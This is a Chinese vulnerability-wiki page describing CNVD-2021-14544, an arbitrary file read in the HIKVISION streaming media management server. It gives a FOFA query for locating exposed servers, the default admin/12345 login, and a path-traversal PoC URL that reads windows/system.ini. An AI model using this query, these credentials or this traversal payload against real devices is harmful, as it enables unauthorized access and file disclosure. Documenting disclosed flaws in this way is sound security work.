menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right IOT安全 chevron_right HIKVISION chevron_right HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544.md
    887 B / 2021-04-21 09:23:46
        # HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544
    
    ## 漏洞描述
    
    杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞登录后台通过文件遍历漏洞获取敏感信息
    
    ## 漏洞影响
    
    `HIKVISION 流媒体管理服务器`
    
    ## FOFA
    
    `title="流媒体管理服务器"`
    
    ## 漏洞复现
    
    登录页面如下, 默认账号密码为 admin/12345
    
    ![](resource/HIKVISION-流媒体管理服务器-后台任意文件读取漏洞-CNVD-2021-14544/media/1.png)
    
    POC如下,访问如下Url下载 system.ini文件
    
    ```bash
    http://xxx.xxx.xxx.xxx/systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/system.ini
    ```
    
    ![](resource/HIKVISION-流媒体管理服务器-后台任意文件读取漏洞-CNVD-2021-14544/media/2.png)
    
    成功读取 C:/windows/system.ini
    
    
    
    links
    file_download